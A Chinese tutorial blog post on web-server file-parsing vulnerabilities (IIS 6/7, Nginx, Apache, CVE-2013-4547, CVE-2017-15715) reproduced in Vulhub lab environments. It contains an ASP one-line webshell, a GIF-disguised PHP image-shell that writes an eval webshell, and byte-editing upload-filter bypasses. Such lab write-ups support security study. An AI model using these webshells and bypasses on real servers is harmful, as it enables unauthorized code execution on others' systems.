文件解析漏洞

Autumn.h2024-12-22 19:30

IIS解析漏洞

IIS6.X

#环境
Windows Server 2003

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>
#asp一句话
<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

IIS7.X

在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在⼀个文件路径/xx.jpg

后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

php.ini里的cgi.fix_pathinfo=1 开启

IIS7在Fast-CGI运行模式下

#环境
PHPstudy for IIS

配置 php.ini 文件,将 cgi.fix_pathinfo=1 注释取消掉;并重启

IIS -->配置网站-->处理程序映射-->PHPStudy_FastCGI -->请求限制 -->取消勾

然后在网站下创建我们的shell;并命名为1.jpg

去网站访问他

加上/.php就可以被解析为php文件

蚁剑连接一下

nginx解析漏洞

Vulhub靶场nginx

nginx_parsing

Nginx的文件解析漏洞...和IIS7.0的解析漏洞同样的原理,因为 cgi.fix_pathinfo=1 造成的解析漏洞

使用 1.jpg/.php 方式进行绕过

搭建doker容器

#搭建docker容器
yum install docker
yum install docker-compose
#确认是否安装成功
docker -v
#搭建Vulhub靶场
git clone https://github.com/vulhub/vulhub.git

搭好Vulhub靶场后

cd vulhub/nginx/nginx_parsing_vulnerability/
docker-compose up -d
#查看端口
docker ps

上传我们的图片马

获取路径后

去访问我们的图片马并在后面加上/.php

蚁剑测试连接

Vulhub靶场CVE-2013-4547x

#启动靶场
cd vulhub-master/nginx/CVE-2013-4547x //切换到靶机目录 
docker-compose build //创建环境
docker-compose up -d //打开环境

创建好后打开我们的靶场上传一张图片马

GIF89a
<?php fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); ?>

上传的时候打开我们的BP进行抓包

在文件名后写上

空格空格.php

并在hex处修改0x20 0x20把最后一个空格换成0x00;然后放行

我们去访问他

发现我们访问不进去这时候就用到我们BP再次抓包进行修改

去Hex把20改回我们的00

就能访问到我们的木马,但是这并不是我们木马的路径,用蚁剑连是连不上的

我们的代码会生成一个一句话我们去连接他就可以了

Apache解析漏洞

Vulhub靶场apache

apache_parsing

Apache HTTPD 支持⼀个文件拥有多个后缀,并为不同后缀执行不同的指令

在Apache1.x/2.x中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,

就再往左判断。如 1.php.xxxxx

#搭建靶场
cd /vulhub/httpd/apache_parsing_vulnerability
docker-compose up -d
docker ps -a

无论我们的php在哪都会解析我们文件里的php代码

GIF89a
<?php fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); ?>

访问一下我们上传的文件

去访问一下h.php也是成功了

Vulhub靶场CVE-2017-15715

#搭建靶场
cd /Vulnhub/vulhub-master/httpd/CVE-2017-15715
docker-compose up -d

Apache HTTPD是⼀款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存

在⼀个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过⼀些服务器的安全

策略。

来到首页,上传文件会被拦截

BP抓一下包,在文件名后加一个空格;并把0x20改成0x0a

放行就成功上传;去访问一下我们的一句话

相关推荐
follycat2 小时前
bestphp‘s revenge
学习·web安全
黑客K-ing3 小时前
网络安全防范
linux·服务器·web安全
轨迹H6 小时前
kali设置中文输入法
linux·网络安全·渗透测试·kali
cr.sheeper6 小时前
Vulnhub靶场Apache解析漏洞
网络安全·apache
19999er7 小时前
CDN信息收集(小迪网络安全笔记~
服务器·网络·笔记·安全·web安全
网络安全queen8 小时前
网络安全-企业环境渗透2-wordpress任意文件读&&FFmpeg任意文件读
安全·web安全·ffmpeg
网络安全Jack8 小时前
防火墙技术与网络安全
web安全·智能路由器·php
网络安全Jack8 小时前
从监控异常发现网络安全
安全·web安全
热门推荐
01ARM学习(31)编译器对overlay方式的支持02HCIA-datacom数通题库和录播视频资料03玄机平台应急响应—webshell查杀04SQL 主从数据库实时备份05YOLOv8训练好模型后,追加轮数继续训练、或者提前终止训练,缩减训练轮数06(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明07VSCode插件 —— Cody AI (免费AI助手!)08校验 GPT-4 真实性的三个经典问题:快速区分 GPT-3.5 与 GPT-4,并提供免费测试网站09Docker 夺命连环 15 问10组基轨迹建模 GBTM的介绍与实现(Stata 或 R)